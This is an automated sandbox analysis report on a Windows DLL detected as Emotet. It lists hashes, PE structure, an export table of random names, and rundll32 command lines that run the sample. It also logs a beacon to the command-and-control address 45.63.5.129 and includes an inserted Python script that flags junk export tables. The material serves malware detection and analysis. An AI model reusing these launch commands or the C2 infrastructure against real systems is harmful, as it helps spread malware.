                            Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..^.W.................................................................................................................................................................................................................................................................................................................................................Z.HvLE.>......H...........w.^m..7I......J.........................hbin................p.\..,..........nk,.JVa.W....... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .JVa.W....... ........................... .......Z.......................Root........lf......Root....nk .JVa.W................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                            Static File Info

                            General

                            File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.0673340607178154
                            TrID:
                            • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                            • Generic Win/DOS Executable (2004/3) 0.20%
                            • DOS Executable Generic (2002/1) 0.20%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:nhlHEF5IVY.dll
                            File size:372736
                            MD5:222719bd9555a8f48428737ab34a6fa6
                            SHA1:b56136e6d1460055917dcb74ed849c59b35300c0
                            SHA256:81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
                            SHA512:170c8e8ab85e18b97c6fe31d9ffb811fe2b67f92ca843d684ecaef75d3454bcf9584035746015305955e7f1b51281c8dcf1b5476c1c55244c8205dfdf4d0dd82
                            SSDEEP:6144:qRsMh9YQWtcgA70wgF7nJy46CQK+kIVDRjudJMrt32fFcRmXIeJXjWMmAD:cvm9Y0HFLNRQKqV4epRmxAvAD
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0...Q...Q...Q..E#...Q..E#...Q..E#...Q../$...Q...$...Q...$...Q...$...Q..E#...Q...Q...Q...Q...Q../$...Q../$...Q..Rich.Q.........

                            File Icon

                            Icon Hash:74f0e4ecccdce0e4

                            Static PE Info

                            General

                            Entrypoint:0x1001a401
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x10000000
                            Subsystem:windows gui
                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                            Time Stamp:0x61A7100E [Wed Dec 1 06:02:54 2021 UTC]
                            TLS Callbacks:0x1000c500
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:609402ef170a35cc0e660d7d95ac10ce

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            cmp dword ptr [ebp+0Ch], 01h
                            jne 00007FAB48CBB647h
                            call 00007FAB48CBB9D8h
                            push dword ptr [ebp+10h]
                            push dword ptr [ebp+0Ch]
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBB4F3h
                            add esp, 0Ch
                            pop ebp
                            retn 000Ch
                            push ebp
                            mov ebp, esp
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBBEEEh
                            pop ecx
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            jmp 00007FAB48CBB64Fh
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBF9D4h
                            pop ecx
                            test eax, eax
                            je 00007FAB48CBB651h
                            push dword ptr [ebp+08h]
                            call 00007FAB48CBFA50h
                            pop ecx
                            test eax, eax
                            je 00007FAB48CBB628h
                            pop ebp
                            ret
                            cmp dword ptr [ebp+08h], FFFFFFFFh
                            je 00007FAB48CBBFB3h
                            jmp 00007FAB48CBBF90h
                            push ebp
                            mov ebp, esp
                            push 00000000h
                            call dword ptr [1002808Ch]
                            push dword ptr [ebp+08h]
                            call dword ptr [10028088h]
                            push C0000409h
                            call dword ptr [10028040h]
                            push eax
                            call dword ptr [10028090h]
                            pop ebp
                            ret
                            push ebp
                            mov ebp, esp
                            sub esp, 00000324h
                            push 00000017h
                            call dword ptr [10028094h]
                            test eax, eax
                            je 00007FAB48CBB647h
                            push 00000002h
                            pop ecx
                            int 29h
                            mov dword ptr [1005AF18h], eax
                            mov dword ptr [1005AF14h], ecx
                            mov dword ptr [1005AF10h], edx
                            mov dword ptr [1005AF0Ch], ebx
                            mov dword ptr [1005AF08h], esi
                            mov dword ptr [1005AF04h], edi
                            mov word ptr [eax], es

                            Data Directories

                            Name                                  Virtual Address  Virtual Size  Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x58390          0x8ac         .rdata
                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x58c3c          0x3c          .rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5d000          0x1bb0        .reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x56fdc          0x54          .rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_TLS             0x57100          0x18          .rdata
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x57030          0x40          .rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_IAT             0x28000          0x154         .rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                            Sections

                            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
                            .text   0x1000           0x264f4       0x26600   False     0.546620521173   data       6.29652715831  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .rdata  0x28000          0x313fa       0x31400   False     0.822468868972   data       7.43226452981  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data   0x5a000          0x1844        0xe00     False     0.270647321429   data       2.60881097454  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .pdata  0x5c000          0x66c         0x800     False     0.3583984375     data       2.21689595795  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .reloc  0x5d000          0x1bb0        0x1c00    False     0.784598214286   data       6.62358237634  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Imports

                            DLL           Import
                            KERNEL32.dll  HeapFree, HeapReAlloc, GetProcessHeap, HeapAlloc, GetModuleHandleA, GetProcAddress, TlsGetValue, TlsSetValue, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, AcquireSRWLockShared, ReleaseSRWLockShared, SetLastError, GetEnvironmentVariableW, GetLastError, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, RtlCaptureContext, ReleaseMutex, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, CloseHandle, GetStdHandle, GetConsoleMode, WriteFile, WriteConsoleW, TlsAlloc, GetCommandLineW, CreateFileA, GetTickCount64, CreateFileW, SetFilePointerEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RaiseException, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetFileType, GetStringTypeW, HeapSize, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, DecodePointer
                            USER32.dll    GetDC, ReleaseDC, GetWindowRect

                            Exports

                            Name               Ordinal  Address
                            Control_RunDLL     1        0x100010a0
                            ajkaibu            2        0x100016c0
                            akyncbgollmj       3        0x10001480
                            alrcidxljxybdggs   4        0x10001860
                            bgmotrriehds       5        0x10001820
                            bojkfvynhhupnooyb  6        0x100019f0
                            bujuoqldqlzaod     7        0x10001800
                            bunsahctogxzts     8        0x100019e0
                            cjogbtafwukesw     9        0x10001830
                            csbbcaopuok        10       0x100016a0
                            cyqrjpaeorjur      11       0x100015f0
                            dlrzuyaeqj         12       0x10001840
                            egiimrq            13       0x10001850
                            evhgyts            14       0x100014f0
                            fdqpjjjyuw         15       0x100017e0
                            finabzjyxhxnnuuv   16       0x10001510
                            fkeacqpbbfw        17       0x10001910
                            fuwsgzf            18       0x10001790
                            fzbmpailk          19       0x10001980
                            gamsrhauvgl        20       0x10001810
                            gjfqgtgk           21       0x10001a10
                            gwsmfxfmekkyr      22       0x100018b0
                            haymuvtatadeydqmk  23       0x10001530
                            hqruohhkvpdalhq    24       0x10001620
                            htdaydfvtjlujwcaj  25       0x10001660
                            hzyrvjtx           26       0x100017c0
                            ifnsupqhxkwj       27       0x10001870
                            ijhgowlpmypocg     28       0x10001720
                            ispjhrqaxnyflnn    29       0x100015a0
                            iszvcqv            30       0x100017a0
                            ixgucop            31       0x100018d0
                            jcdvrhrguqtjpkc    32       0x100016b0
                            jkfyadsdpoks       33       0x100019c0
                            kfzgxmljkwaqy      34       0x10001730
                            kzfvroxozxufciczm  35       0x10001740
                            lpstjqa            36       0x10001900
                            ltkoyvzovzkqemyw   37       0x10001630
                            mdigcwjymnzvgaql   38       0x100014d0
                            mefathlzguuhqodfx  39       0x10001950
                            mgsrmfbja          40       0x10001500
                            mrxhcceopg         41       0x100014a0
                            nafhmuoq           42       0x100018f0
                            nefxgpc            43       0x100018a0
                            nrehxpiznrppeu     44       0x10001690
                            nucocnvjyqp        45       0x100018e0
                            obxoxtcbntaxofr    46       0x10001890
                            ofrzojd            47       0x100016e0
                            oofbctfc           48       0x10001550
                            opzpazspbecyjojf   49       0x100015b0
                            oqoigff            50       0x10001a00
                            oujlzhzvhjh        51       0x100016f0
                            ovpsanbypajv       52       0x100015e0
                            pblpcaadqbdxyb     53       0x10001680
                            ragwdgnyohftj      54       0x100017d0
                            rfosmac            55       0x10001710
                            rgymbuetvifqjqdlo  56       0x10001930
                            rmoxbxbbgidnbds    57       0x10001970
                            rxnkmfbycdcc       58       0x10001560
                            sefltbc            59       0x10001880
                            sgieprcsphl        60       0x100019a0
                            shpcmnqzvyltgdt    61       0x100016d0
                            slktbekupvmdbt     62       0x100015c0
                            sormivnk           63       0x10001570
                            tdblkstlyin        64       0x10001600
                            tkllyrc            65       0x10001650
                            tkwpnvfqnbpbdqe    66       0x10001a20
                            tnhtgnjrabqakgeke  67       0x10001700
                            tzpmcwwig          68       0x10001520
                            uceklmggjof        69       0x10001610
                            ukwdddyj           70       0x10001640
                            uwnaptydgur        71       0x10001940
                            vjusqoeo           72       0x10001580
                            vnyufpq            73       0x10001590
                            vsrwmkhzkrtlexxb   74       0x100014e0
                            wermsdfzb          75       0x10001770
                            wkhpfdjkypy        76       0x100014c0
                            wksndtayhfm        77       0x100015d0
                            wnjvxspilxpchq     78       0x10001670
                            wuqwfssiddrcl      79       0x10001570
                            wyyhtqptznbrknitg  80       0x100017f0
                            wzkcijdvadq        81       0x10001540
                            wzxlvxuyy          82       0x100019b0
                            xhtxeilfgsghxik    83       0x10001780
                            xvdijhconoukll     84       0x100014b0
                            ybbwnezvxfafm      85       0x10001750
                            yeylpreasnzamgac   86       0x100019d0
                            ypkidshxgzkkehc    87       0x100018c0
                            ypzvmpfbgai        88       0x10001760
                            zbrzizodycg        89       0x10001990
                            zdiuqcnzg          90       0x10001920
                            zfkwwtxd           91       0x10001490
                            zktykfwmaehxg      92       0x10001600
                            zmkbqvofdhermov    93       0x10001960
                            zvtqmkitgmzgo      94       0x100017b0
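The export table above has one conventional entry point, Control_RunDLL, and 93 lowercase pseudo-random names whose addresses step through 0x10001480 to 0x10001a20 sixteen bytes apart, with two addresses (0x10001570 and 0x10001600) each exported under two names. The following Python script is an added triage example, not code from the report or from Joe Sandbox: it reads the table as transcribed from the report (ordinals run 1..94 in listing order and are regenerated) and scores it with three heuristics. The name regex, the 0x20 gap limit, the 0.8 junk ratio and the "two reasons" rule are this example's own assumptions.

```python
"""Triage a DLL export table for junk-export patterns.

Added example, not part of the sandbox report. EXPORT_TABLE is transcribed
from the report's "Exports" section as name/address pairs; ordinals are
regenerated from listing order. Thresholds below are assumptions.
"""
import re
import statistics
from collections import Counter

EXPORT_TABLE = """
Control_RunDLL 100010a0 ajkaibu 100016c0 akyncbgollmj 10001480 alrcidxljxybdggs 10001860
bgmotrriehds 10001820 bojkfvynhhupnooyb 100019f0 bujuoqldqlzaod 10001800 bunsahctogxzts 100019e0
cjogbtafwukesw 10001830 csbbcaopuok 100016a0 cyqrjpaeorjur 100015f0 dlrzuyaeqj 10001840
egiimrq 10001850 evhgyts 100014f0 fdqpjjjyuw 100017e0 finabzjyxhxnnuuv 10001510
fkeacqpbbfw 10001910 fuwsgzf 10001790 fzbmpailk 10001980 gamsrhauvgl 10001810
gjfqgtgk 10001a10 gwsmfxfmekkyr 100018b0 haymuvtatadeydqmk 10001530 hqruohhkvpdalhq 10001620
htdaydfvtjlujwcaj 10001660 hzyrvjtx 100017c0 ifnsupqhxkwj 10001870 ijhgowlpmypocg 10001720
ispjhrqaxnyflnn 100015a0 iszvcqv 100017a0 ixgucop 100018d0 jcdvrhrguqtjpkc 100016b0
jkfyadsdpoks 100019c0 kfzgxmljkwaqy 10001730 kzfvroxozxufciczm 10001740 lpstjqa 10001900
ltkoyvzovzkqemyw 10001630 mdigcwjymnzvgaql 100014d0 mefathlzguuhqodfx 10001950 mgsrmfbja 10001500
mrxhcceopg 100014a0 nafhmuoq 100018f0 nefxgpc 100018a0 nrehxpiznrppeu 10001690
nucocnvjyqp 100018e0 obxoxtcbntaxofr 10001890 ofrzojd 100016e0 oofbctfc 10001550
opzpazspbecyjojf 100015b0 oqoigff 10001a00 oujlzhzvhjh 100016f0 ovpsanbypajv 100015e0
pblpcaadqbdxyb 10001680 ragwdgnyohftj 100017d0 rfosmac 10001710 rgymbuetvifqjqdlo 10001930
rmoxbxbbgidnbds 10001970 rxnkmfbycdcc 10001560 sefltbc 10001880 sgieprcsphl 100019a0
shpcmnqzvyltgdt 100016d0 slktbekupvmdbt 100015c0 sormivnk 10001570 tdblkstlyin 10001600
tkllyrc 10001650 tkwpnvfqnbpbdqe 10001a20 tnhtgnjrabqakgeke 10001700 tzpmcwwig 10001520
uceklmggjof 10001610 ukwdddyj 10001640 uwnaptydgur 10001940 vjusqoeo 10001580
vnyufpq 10001590 vsrwmkhzkrtlexxb 100014e0 wermsdfzb 10001770 wkhpfdjkypy 100014c0
wksndtayhfm 100015d0 wnjvxspilxpchq 10001670 wuqwfssiddrcl 10001570 wyyhtqptznbrknitg 100017f0
wzkcijdvadq 10001540 wzxlvxuyy 100019b0 xhtxeilfgsghxik 10001780 xvdijhconoukll 100014b0
ybbwnezvxfafm 10001750 yeylpreasnzamgac 100019d0 ypkidshxgzkkehc 100018c0 ypzvmpfbgai 10001760
zbrzizodycg 10001990 zdiuqcnzg 10001920 zfkwwtxd 10001490 zktykfwmaehxg 10001600
zmkbqvofdhermov 10001960 zvtqmkitgmzgo 100017b0
"""

# Assumed heuristic: lowercase letters only, no digits, capitals or underscores.
JUNK_NAME_RE = re.compile(r"^[a-z]{6,20}$")
RUNDLL32_ENTRY = "Control_RunDLL"  # the named export present in the report


def parse_exports(table):
    """Return (name, ordinal, address) tuples; ordinals follow listing order."""
    tokens = table.split()
    return [(name, i + 1, int(addr, 16))
            for i, (name, addr) in enumerate(zip(tokens[0::2], tokens[1::2]))]


def triage_exports(exports, junk_ratio=0.8, max_median_gap=0x20, min_exports=20):
    """Score an export table; all thresholds are assumptions of this example."""
    names = [n for n, _, _ in exports]
    addrs = sorted(a for _, _, a in exports)
    junk = [n for n in names if JUNK_NAME_RE.match(n)]
    gaps = [b - a for a, b in zip(addrs, addrs[1:]) if b != a]  # distinct neighbours
    dupes = {a: c for a, c in Counter(addrs).items() if c > 1}
    f = {
        "export_count": len(exports),
        "junk_name_ratio": len(junk) / len(names) if names else 0.0,
        "median_gap": statistics.median(gaps) if gaps else 0,
        "duplicate_addresses": dupes,
        "has_rundll32_entry": RUNDLL32_ENTRY in names,
        "reasons": [],
    }
    if f["export_count"] >= min_exports and f["junk_name_ratio"] >= junk_ratio:
        f["reasons"].append(f"{len(junk)}/{len(names)} export names are lowercase gibberish")
    if gaps and f["median_gap"] <= max_median_gap:
        f["reasons"].append(f"neighbouring exports are {int(f['median_gap'])} bytes apart, "
                            "so most exports can hold at most that much code")
    if dupes:
        f["reasons"].append(f"{len(dupes)} addresses are exported under more than one name")
    f["suspicious"] = len(f["reasons"]) >= 2
    return f


if __name__ == "__main__":
    result = triage_exports(parse_exports(EXPORT_TABLE))
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the transcribed table the script reports a junk-name ratio of 93/94, a median neighbour gap of 16 bytes, the two doubly-exported addresses and the presence of Control_RunDLL; a table with a handful of descriptively named exports spaced kilobytes apart produces no reasons.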

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                            Dec 2, 2021 09:36:57.329689026 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.329726934 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:57.329922915 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.354778051 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.354801893 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:57.700581074 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:57.700851917 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.986476898 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.986501932 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:57.987112999 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:57.989145041 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:57.992305040 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:58.032866955 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:58.935583115 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:58.935683012 CET  443          49794      45.63.5.129  192.168.2.4
                            Dec 2, 2021 09:36:58.935733080 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:58.935844898 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:58.938580990 CET  49794        443        192.168.2.4  45.63.5.129
                            Dec 2, 2021 09:36:58.938596010 CET  443          49794      45.63.5.129  192.168.2.4

                            HTTP Request Dependency Graph

                            • 45.63.5.129

                            HTTPS Proxied Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.4 | 49794 | 45.63.5.129 | 443 | C:\Windows\SysWOW64\rundll32.exe

                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-02 08:36:57 UTC | 0 | OUT | GET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1
                            Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==
                            Host: 45.63.5.129
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            2021-12-02 08:36:58 UTC | 0 | IN | HTTP/1.1 200 OK
                            Server: nginx
                            Date: Thu, 02 Dec 2021 08:36:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            2021-12-02 08:36:58 UTC0INData Raw: 33 61 37 0d 0a 97 3a 56 2d be 96 f5 77 9f c7 15 28 85 07 d0 a4 0c d0 11 7f 52 ef 65 ac c0 f5 22 82 b9 e0 67 75 c5 9f ed 58 e0 d6 58 41 27 f4 04 15 62 39 f8 07 8b 7b 3e b5 a8 9a 35 ff 23 5c 35 67 bd 4b 33 9a 01 02 61 ba e8 6d 52 7b 7c aa 3e 94 97 70 a8 3a 28 66 fe ea 28 a1 85 3a 10 8e e3 a5 2f 25 49 c5 37 f5 16 61 00 26 a2 f7 ae a3 07 66 26 93 d5 0d d9 5b a9 d5 c9 dd d5 40 57 bf eb 5e 5e aa 90 68 41 28 da 0d 71 fe da 82 04 35 47 16 2a e1 6a ae 93 6c b4 4d b2 7b 52 75 a5 3e 49 3a 7f 8b fc 6e 63 ca 9f 2d b8 9d 09 ac ee 3a a8 10 1b 47 18 b3 51 aa 84 a9 0e 83 3c 31 0c 2e a5 3a a5 49 35 7c 09 3a 06 cc 7a 60 6a cf ab bd b2 12 86 ea 92 dc 2d 7b 79 1f a8 10 26 d4 5b 3a 11 60 b6 61 2e 5c cf 55 13 1b 62 c0 02 2b cf 7d 56 17 4d ae 15 2a 95 9d e3 cd 04 80 57 06 ca cf
                            Data Ascii: 3a7:V-w(Re"guXXA'b9{>5#\5gK3amR{|>p:(f(:/%I7a&f&[@W^^hA(q5G*jlM{Ru>I:nc-:GQ<1.:I5|:z`j-{y&[:`a.\Ub+}VM*W


                            Code Manipulations

                            Statistics

                            Behavior

                            System Behavior

                            General

                            Start time: 09:33:09
                            Start date: 02/12/2021
                            Path: C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit): true
                            Commandline: loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll"
                            Imagebase: 0xa20000
                            File size: 893440 bytes
                            MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:33:09
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit): true
                            Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                            Imagebase: 0x11d0000
                            File size: 232960 bytes
                            MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high

                            General

                            Start time: 09:33:09
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:33:10
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:33:14
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, Author: Joe Security
                            Reputation: high

                            General

                            Start time: 09:33:22
                            Start date: 02/12/2021
                            Path: C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit): true
                            Commandline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj
                            Imagebase: 0xd60000
                            File size: 61952 bytes
                            MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
